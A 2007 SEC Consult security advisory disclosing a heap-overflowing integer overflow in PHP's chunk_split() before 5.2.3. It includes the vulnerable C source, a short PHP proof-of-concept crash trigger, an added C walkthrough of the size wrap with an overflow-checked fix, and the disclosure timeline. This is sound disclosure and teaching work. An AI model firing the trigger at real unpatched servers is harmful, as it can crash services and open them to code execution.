Message-ID: <46602AE3.4010303@sec-consult.com>
Date: Fri, 1 Jun 2007 16:19:15 +0200
From: Gerhard Wagner <research@...-consult.com>
To: <Bugtraq@...urityfocus.com>, <full-disclosure@...ts.grok.org.uk>
Subject: SEC Consult SA-20070601-0 :: PHP chunk_split() integer overflow

SEC Consult Security Advisory < 20070601-0 >
===========================================================================
                     title: PHP chunk_split() integer overflow
                   program: PHP
        vulnerable version: < 5.2.3
                    impact: moderate
                  homepage: http://www.php.net
                     found: 2007-05-25
                        by: Gerhard Wagner / SEC Consult / www.sec-consult.com
            permanent link: http://www.sec-consult.com/291.html
===========================================================================


Vendor description:
---------------

PHP is a widely-used general-purpose scripting language that is
especially suited for Web development ...


Vulnerability overview:
---------------

The values chunks, srclen and chunklen flow into the size argument of a
memory allocation without any range check. Because the size expression
can overflow, a buffer that is too small may be allocated, and the copy
that follows overflows the heap. This crashes the PHP process and may
allow execution of arbitrary code.


Vulnerability details:
---------------

At line 1963 php_chunk_split() allocates the buffer that will hold the
function's result. If chunks and endlen are both larger than 65534, the
product (chunks + 1) * endlen overflows the int used to compute the size,
so too little memory is allocated and the copy loop that follows overflows
the heap.


ext/standard/string.c:

1953 static char *php_chunk_split(char *src, int srclen, char *end, int endlen, int chunklen, int *destlen)
1954 {
1955     char *dest;
1956     char *p, *q;
1957     int chunks; /* complete chunks! */
1958     int restlen;
1959
1960     chunks = srclen / chunklen;
1961     restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963     dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1), sizeof(char), 0);
1964
1965     for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966         memcpy(q, p, chunklen);
1967         q += chunklen;
1968         memcpy(q, end, endlen);
1969         q += endlen;
1970         p += chunklen;
1971     }


proof of concept:
---------------

<?php
    $a = str_repeat("A", 65535);
    $b = 1;
    $c = str_repeat("A", 65535);
    chunk_split($a, $b, $c);
?>
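Evaluating the size expression from line 1963 with the proof of concept's parameters (srclen 65535, chunklen 1, endlen 65535), as an added C example that is not part of the advisory or of PHP: it shows the 32-bit wrap that turns a 4 GiB requirement into a zero-byte allocation, and an overflow-checked variant of the computation (assumes the GCC/Clang __builtin_*_overflow builtins) that rejects the input instead of wrapping.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
/* Size expression from line 1963 of php_chunk_split(), evaluated in
 * 32-bit unsigned arithmetic to mirror how the int expression wraps. */
uint32_t wrapped_dest_size(uint32_t srclen, uint32_t chunklen, uint32_t endlen)
{
    uint32_t chunks = srclen / chunklen;
    return srclen + (chunks + 1u) * endlen + 1u;
}

/* The same expression in 64-bit arithmetic: the size really needed. */
uint64_t exact_dest_size(uint64_t srclen, uint64_t chunklen, uint64_t endlen)
{
    uint64_t chunks = srclen / chunklen;
    return srclen + (chunks + 1) * endlen + 1;
}

/* Hardened computation (assumption: GCC/Clang __builtin_*_overflow are
 * available). Every step is checked in int, the type the original code
 * uses; a size that does not fit is rejected instead of wrapped. */
bool checked_dest_size(int srclen, int chunklen, int endlen, int *out)
{
    int chunks, nmemb, product, total;
    if (srclen < 0 || chunklen <= 0 || endlen < 0) return false;
    chunks = srclen / chunklen;
    if (__builtin_add_overflow(chunks, 1, &nmemb)) return false;
    if (__builtin_mul_overflow(nmemb, endlen, &product)) return false;
    if (__builtin_add_overflow(product, srclen, &total)) return false;
    if (__builtin_add_overflow(total, 1, &total)) return false;
    *out = total;
    return true;
}

/* Checked size, or -1 when it cannot be represented. */
int checked_dest_size_or_neg(int srclen, int chunklen, int endlen)
{
    int n;
    return checked_dest_size(srclen, chunklen, endlen, &n) ? n : -1;
}

int main(void)
{
    /* Parameters of the advisory's proof of concept: srclen 65535, chunklen 1, endlen 65535. */
    printf("wrapped 32-bit size : %u bytes\n", (unsigned)wrapped_dest_size(65535, 1, 65535));
    printf("size actually needed: %llu bytes\n", (unsigned long long)exact_dest_size(65535, 1, 65535));
    printf("checked computation : %d (-1 = rejected)\n", checked_dest_size_or_neg(65535, 1, 65535));
    return 0;
}
```

With the proof of concept's values the wrapped size is exactly 0 while the loop goes on to write roughly 4 GiB, which is why the tiny allocation is overrun immediately.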


vulnerable versions:
---------------

Version 5.2.3 fixes this security issue. All earlier releases should be
considered affected by the demonstrated vulnerability.

vendor status:
---------------
vendor notified: 2007-05-29
vendor response: 2007-05-29
patch available: 2007-06-01
coordinated disclosure: 2007-06-01

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Gerhard Wagner / @2007


